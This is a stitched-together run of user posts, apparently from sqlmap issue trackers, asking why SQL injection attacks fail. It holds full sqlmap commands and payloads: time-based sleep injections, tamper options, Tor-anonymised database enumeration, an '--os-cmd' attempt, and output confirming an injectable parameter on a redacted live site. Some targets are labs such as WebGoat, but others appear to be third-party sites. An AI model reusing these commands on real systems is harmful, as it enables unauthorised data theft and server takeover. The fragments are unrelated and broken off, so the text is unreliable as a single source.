Hi,

Attempting to fully exploit the following vulnerability with sqlmap: http://www.exploit-db.com/exploits/31834/

You can download the Turnkey Wordpress appliance, then download the vulnerable version of adrotate here:

http://downloads.wordpress.org/plugin/adrotate.3.9.4.zip

Simply upload the zip and activate the plugin, you will be vulnerable. I can successfully exploit the SQLi using the PoC and various tinkerings. The fun thing about it is the SQLi result shows up in the Location header (and your HTTP code is 302, instead of 200 when it doesn't work). I have set --code=302 as well as --string='Location:', but I can't get SQLmap to detect it.

You also must use --tamper=base64encode.

A problem seems to be there is no body. The result of the first column selected in the payload is put in the Location header.

I would like to ask, sqlmapapi if activated will open a port, if I think this port can only visit a ip, sqlmap can be set up?If the port has been scanned, it means that others can access and use.

can someone tell me, why I gets this error, when I use tor? In normal connecting without tor, all working.

using python version 2.7
sqlmap {1.0-dev-nongit-20150919}

https://gyazo.com/e3ab8127d02ed761fe4723d2b17d43c4

I use sqlmap.py -u "host" --dbs --tor --tor-type=SOCKS5 --tor-port=9150 --random-agent

Hi Running sqlmap 1.0-dev, Kali linux up to date, tomcat 7, and latest WebGoat v5.4

I can log into WebGoat via the browser http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100 with the login and password.

I then tried to execute this:

sqlmap -u "http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100" --banner --auth-type="Basic" --auth-cred="webgoat:webgoat"

but it gives me:

[*] starting at 17:11:09

[17:11:09] [INFO] testing connection to the target URL [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [WARNING] HTTP error codes detected during run: 401 (Unauthorized) - 1 times

[*] shutting down at 17:11:09

I did read the manual page and googled the terms “CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials” read some web sites, but still, I’m stumped. I have read the following links:

https://github.com/sqlmapproject/sqlmap/issues/542 https://github.com/sqlmapproject/sqlmap/issues/125 http://tech4castblog.wordpress.com/2012/04/20/webgoat-http-authentication-type-and-valid-credentials-401-5/ (so is there a way to specify the port number 8080 to sqlmap? Shouldn’t sqlmap be able to figure out the port number since it’s specified in the URL?…is this the cause of error?)

http://comments.gmane.org/gmane.comp.security.sqlmap/234

the above came from the following google terms: “sqlmap [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)”

Appreciate some help. Thanks. Gordon

Hello! Why does not searchable database! I have changed in the Tour test comparison page

C:\Python27\sqlmap>sqlmap.py -u "http://[REDACTED]/ksjh_list.aspx?year=2011"
--level 5 --risk 3 --batch --tamper=between,charunicodeencode --dbs --dbms "Micr
osoft SQL Server"



[09:54:27] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
n patch). Potential problems in enumeration phase can be expected
GET parameter 'year' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 531 HTTP(s) req
uests:

---
Place: GET
Parameter: year
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: year=2011 AND 2168=2168

---
[09:54:27] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[09:54:27] [INFO] testing MySQL
[09:54:27] [WARNING] the back-end DBMS is not MySQL
[09:54:27] [INFO] testing Oracle
[09:54:28] [WARNING] the back-end DBMS is not Oracle
[09:54:28] [INFO] testing PostgreSQL
[09:54:29] [WARNING] the back-end DBMS is not PostgreSQL
[09:54:29] [INFO] testing Microsoft SQL Server
[09:54:29] [INFO] confirming Microsoft SQL Server
[09:54:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[09:54:31] [INFO] fetching database names
[09:54:31] [INFO] fetching number of databases
[09:54:31] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:54:31] [INFO] retrieved:
[09:54:33] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[09:54:33] [ERROR] unable to retrieve the number of databases
[09:54:33] [INFO] retrieved:
[09:54:36] [INFO] falling back to current database
[09:54:36] [INFO] fetching current database
[09:54:36] [INFO] retrieved:
[09:54:40] [CRITICAL] unable to retrieve the database names
[09:54:40] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 145 times

[*] shutting down at 09:54:40


C:\Python27\sqlmap>

I wanted to start SQLmap on kali linux but i got the following error: sqlmap error: missing a mandatory option (-d, -u, -l , -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or --h for advanced help.

So i updated Kali Linux, still no fix. Then i downloaded it on windows with Python. still the same error...

I hope you can help me.

Hello, could you explain me pls what does it meen this error and what can i change in comnnad that this error delete. THANKS!

./sqlmap.py -u http://www.site.com/category.asp?category_id=6 --os-cmd -v l [00:54:07] [INFO] resuming back-end DBMS 'microsoft sql server' [00:54:07] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

Parameter: category_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause

Payload: category_id=6 AND 2290=2290

[00:54:08] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP back-end DBMS: Microsoft SQL Server 2008 [00:54:08] [CRITICAL] unable to execute operating system commands via the back-end DBMS

[*] shutting down at 00:54:08

The number of times where I've had a straight forward injection and sqlmap has failed to exploit it is unbelievable.

One example was with a parameter vulnerable to time based sql injection after the order by clause, so the payload would be: vulnerableparameter=2,sleep(2)

Another payload that works is: vulnerableparameter=2,(select/**/sleep(10)/**/from/**/dual/**/where/**/2/**/=/**/5)

and then sqlmap should expand on that to get database,tables names etc.. etc. If it tries to end the query, it will break e.g using # or -- or any other comments it will break, so I told sqlmap not to use any and since spaces are not allowed, I also made it use mysql comments.

I've tried: sqlmap.py -u "http://example.com/?vulnerableparameter=2" -p "vulnerableparameter" --prefix="," --suffix="" --technique=T --dbs --dbms=mysql --level=5 --risk=3 --tamper=space2comment

and unbelievably, it said it was not injectable, unreal.

How can sqlmap fail to find such simple injections?

Design and develop an asynchronous RESTful API to interact with sqlmap engine. This is useful to use/call sqlmap from custom scripts, web interface, third-party tools or similar as opposed to use it from command line or wrap it as in a call similar to os.popen('sqlmap...').

This API will replace the XML-RPC service (#287).

When I try to start testing with sqlmap, sqlmap will send queries like these :

1'tFmggO<'">AeQpzc

1"(,..,'(,,

And my target will response with error 500 and sqlmap will show me connection dropped

I tested my target manualy and it is okey

So how should I skip those two queries? Or in which files I can comment this lines?

Regards

id[*]=0 I want to inject inside like this: id[' aNd select * from user#]=1 or this: id[' aNd select * from user#]=

but.. sqlmap payload: id[' aNd select * from user# 從我的 MI6，使用 FastHub 發送。

從我的 MI6，使用 FastHub 發送。